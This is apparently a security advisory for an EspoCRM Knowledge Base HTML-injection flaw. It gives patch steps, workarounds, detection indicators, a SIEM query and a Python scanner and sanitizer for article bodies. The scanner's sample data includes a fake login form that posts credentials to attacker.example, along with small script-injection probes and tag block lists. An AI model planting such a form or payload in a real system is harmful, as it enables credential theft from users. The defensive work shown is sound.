CVE-2025-32390
📋 TL;DR
EspoCRM versions before 9.0.8 do not sanitize HTML in Knowledge Base article bodies. An authenticated user who can create or edit articles can embed an imitation login form that is rendered to everyone who opens the article; credentials typed into it are captured in plain text. Every authenticated user with read access to Knowledge Base articles is a potential victim.
💻 Affected Systems
- EspoCRM
📦 What is this software?
EspoCRM by EspoCRM: an open-source, web-based CRM written in PHP. The Knowledge Base module stores articles as rich-text (HTML) bodies that are rendered to every user allowed to read them.
⚠️ Risk & Real-World Impact
Worst Case
An attacker plants articles that clone the EspoCRM login page and the login pages of other enterprise applications, harvests credentials from users across the organization, and uses the stolen accounts to reach systems beyond the CRM.
Likely Case
An insider, or an attacker holding a compromised low-privilege account, publishes a fake "session expired, please sign in" article inside EspoCRM and collects passwords from colleagues who read it, leading to account takeover and exposure of CRM data.
If Mitigated
With article creation and editing limited to trusted users and article changes reviewed, exploitation is confined to isolated attempts that are detected and removed before many users are exposed.
🎯 Exploit Status
Exploitation requires an authenticated account that can create or edit Knowledge Base articles; beyond that it needs no tooling, since pasting HTML into an article body is enough. The vendor advisory describes the issue in enough detail to reproduce it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.0.8
Vendor Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-qrwp-v8v3-hqp2
Restart Required: No
Instructions:
1. Back up the EspoCRM installation directory and the database.
2. Obtain the 9.0.8 (or later) release or upgrade package from the official repository.
3. Apply it through EspoCRM's own upgrade process (Administration > Upgrade or the command-line upgrader) rather than copying files over the installation, so that any database changes shipped with the release are applied.
4. Clear the cache from Administration > Clear Cache, and run Administration > Rebuild if the upgrade did not do so.
5. Confirm the new version in Administration > About.
🔧 Temporary Workarounds
Restrict who can create and edit Knowledge Base articles
Injection needs write access to an article, so removing Create and Edit permission on Knowledge Base articles from every role that does not need it (Administration > Roles) blocks the attack for those roles. This is the workaround that actually prevents new malicious articles.
Disable Knowledge Base HTML editing
Where your instance allows it, temporarily turn off rich text/HTML editing for the article body so that new edits cannot introduce markup. Existing articles still need to be reviewed for injected HTML.
Restrict Knowledge Base read access
Limit Knowledge Base read access to only the users who need it (Administration > Roles). This does not stop injection; it only shrinks the set of users who could be shown a fake login form.
🧯 If You Can't Patch
- Sanitize Knowledge Base article bodies on save or on render with an HTML allow-list that drops form elements (form, input, button), active content (script, iframe, object, embed) and inline event handlers; this is what the fix does, so doing it yourself is only a stopgap until you can upgrade
- Deploy web application firewall (WAF) rules that reject article create/update requests whose body contains form or script markup; expect these to catch only unobfuscated payloads
- Review existing articles for injected markup, since a WAF or role change does nothing about content that is already published
🔍 How to Verify
Check if Vulnerable:
Check EspoCRM version in Administration > About. If version is below 9.0.8, the system is vulnerable.
Check Version:
Check Administration > About in EspoCRM web interface or examine version.php file in installation directory
Verify Fix Applied:
After patching, verify that the version shown in Administration > About is 9.0.8 or higher. Then, in a test instance or with a disposable test user, create an article whose body contains a form with a password input and confirm that the rendered article no longer contains the form.
📡 Detection & Monitoring
Log Indicators:
- Knowledge Base articles created or modified by users who do not normally author them (EspoCRM's Action History records the user and record for each create/update)
- Article bodies containing form, input, script or iframe elements, or attributes pointing at hosts outside your domain
- Successful logins for users who recently read such an article from unfamiliar IP addresses, devices or times, which is what harvested credentials look like when reused
Network Indicators:
- POST or PUT requests to the KnowledgeBaseArticle endpoint of the REST API (/api/v1/KnowledgeBaseArticle) whose body carries form or script markup
- Browser requests from EspoCRM article pages (visible in the Referer header) that POST form data to a host outside the organization
SIEM Query:
The event and field names below are placeholders; map them to however your log pipeline records EspoCRM article changes. The parentheses matter: without them the OR binds only the last two terms and the query matches every event whose content mentions "password".
source="espocrm" AND event="knowledge_base_article_edit" AND (content CONTAINS "<form" OR content CONTAINS "<input" OR content CONTAINS "<script" OR content CONTAINS "<iframe")
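The checks described under "If You Can't Patch" and "Detection & Monitoring" both come down to the same thing: parse an article body, notice the markup a fake login page needs, and either flag it or strip it. The following is an added example, not EspoCRM's own code or its actual fix, written with only the Python standard library. The article records (id, name, body) mirror the KnowledgeBaseArticle fields but the contents are constructed for this example; the hostname attacker.example is a placeholder.

```python
"""Flag and strip login-form HTML in Knowledge Base article bodies.

Added example, not EspoCRM's code. One pass over the body records why it
looks like a credential-harvesting page and rebuilds a sanitized copy.
"""
from html import escape
from html.parser import HTMLParser

# Elements a fake login page needs and a KB article does not: form controls
# capture input, script/iframe/object can exfiltrate or embed a remote login
# page, meta/base can redirect or rewrite link targets.
BLOCKED_TAGS = {"form", "input", "button", "select", "textarea", "script",
                "iframe", "object", "embed", "meta", "base"}
VOID_TAGS = {"input", "meta", "base", "br", "img", "hr", "link"}
URL_ATTRS = {"href", "src", "action", "formaction"}
CREDENTIAL_WORDS = ("password", "passcode", "sign in", "log in", "login")


class KbArticleScanner(HTMLParser):
    """Stream the body once: collect findings and a sanitized copy."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []      # reasons the body looks malicious
        self._out = []          # sanitized HTML fragments
        self._text = []         # all visible text, incl. inside dropped forms
        self._skip_depth = 0    # > 0 while inside a blocked container

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self.findings.append(f"blocked element <{tag}>")
            if tag not in VOID_TAGS:
                self._skip_depth += 1   # drop everything until </tag>
            return
        if self._skip_depth:
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):   # onclick, onload, onerror, ...
                self.findings.append(f"dropped event handler {name} on <{tag}>")
                continue
            if (name in URL_ATTRS and value
                    and value.strip().lower().startswith("javascript:")):
                self.findings.append(f"dropped javascript: URL in {name} on <{tag}>")
                continue
            kept.append(name if value is None
                        else f'{name}="{escape(value, quote=True)}"')
        self._out.append("<" + " ".join([tag] + kept) + ">")

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if tag in BLOCKED_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if not self._skip_depth:
            self._out.append(f"</{tag}>")

    def handle_data(self, data):
        self._text.append(data)     # keep form text for the wording check
        if not self._skip_depth:
            self._out.append(escape(data, quote=False))

    # Comments, doctype and processing instructions are dropped simply by
    # not overriding their handlers.

    def sanitized(self):
        return "".join(self._out)


def scan_article(body):
    """Return {'suspicious', 'findings', 'sanitized'} for one article body."""
    scanner = KbArticleScanner()
    scanner.feed(body)
    scanner.close()
    text = " ".join(scanner._text).lower()
    words = [w for w in CREDENTIAL_WORDS if w in text]
    has_controls = any("<form>" in f or "<input>" in f for f in scanner.findings)
    # Login wording alone is normal in a KB ("how to reset your password");
    # it only becomes a finding next to form controls.
    if words and has_controls:
        scanner.findings.append("credential wording with form controls: "
                                + ", ".join(words))
    return {"suspicious": bool(scanner.findings),
            "findings": scanner.findings,
            "sanitized": scanner.sanitized()}


def flag_articles(records):
    """Return ids of suspicious articles from a list of {id, name, body}."""
    return [r["id"] for r in records if scan_article(r["body"])["suspicious"]]


# Constructed sample export; the layout mirrors KnowledgeBaseArticle fields.
SAMPLE_ARTICLES = [
    {"id": "kb-1", "name": "Resetting your password",
     "body": '<h2>Resetting your password</h2>'
             '<p>Go to <a href="/reset">Reset</a> and follow the prompts.</p>'},
    {"id": "kb-2", "name": "Session expired",
     "body": '<h2>Session expired, please sign in</h2>'
             '<form action="https://attacker.example/collect" method="post">'
             '<input type="text" name="username">'
             '<input type="password" name="password">'
             '<button>Log in</button></form>'},
    {"id": "kb-3", "name": "Tips",
     "body": '<p onmouseover="alert(1)">Hover</p><a href="javascript:alert(1)">x</a>'},
]

if __name__ == "__main__":
    for rec in SAMPLE_ARTICLES:
        result = scan_article(rec["body"])
        print(rec["id"], "SUSPICIOUS" if result["suspicious"] else "ok", result["findings"])
    print("flagged:", flag_articles(SAMPLE_ARTICLES))
```

The scanner is deliberately an allow-nothing-dangerous filter rather than a full allow-list: it drops blocked elements and their contents, strips inline event handlers and javascript: URLs, and re-escapes text on output. Run as a scheduled job over an export of article bodies it gives you the "suspicious HTML in KB article edits" indicator from the list above; wired into a save hook it gives you the stopgap sanitization. A sanitizer you ship in production should be a reviewed allow-list library, since this example does not handle every HTML quirk (for example, SVG and MathML namespaces).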